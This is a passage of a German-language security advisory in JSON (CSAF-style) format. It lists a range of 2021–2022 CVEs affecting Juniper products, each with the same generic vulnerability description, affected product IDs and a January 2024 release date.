"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-20141"
},
{
"cve": "CVE-2022-1789",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-1789"
},
{
"cve": "CVE-2022-1679",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-1679"
},
{
"cve": "CVE-2022-1462",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-1462"
},
{
"cve": "CVE-2022-0934",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-0934"
},
{
"cve": "CVE-2022-0330",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-0330"
},
{
"cve": "CVE-2021-44832",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2021-44832"
},
{
"cve": "CVE-2021-44790",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2021-44790"
},
{
"cve": "CVE-2021-44228",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2021-44228"
},
{
"cve": "CVE-2021-4155",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2021-4155"
},
{
"cve": "CVE-2021-39275",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2021-39275"
},
{
"cve": "CVE-2021-3752",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2021-3752"
},
{
"cve": "CVE-2021-3621",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2021-3621"
},
{
"cve": "CVE-2021-3573",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2021-3573"
},
{
"cve": "CVE-2021-3564",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2021-3564"
},
{
"cve": "CVE-2021-34798",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2021-34798"
},
{
"cve": "CVE-2021-33656",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2021-33656"
},
{
"cve": "CVE-2021-33655",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2021-33655"
},
{
"cve": "CVE-2021-26691",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2021-26691"
},
{
"cve": "CVE-2021-26341",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2021-26341"
},
{
"cve": "CVE-2021-25220",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2021-25220"
},
{
"cve": "CVE-2021-0920",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
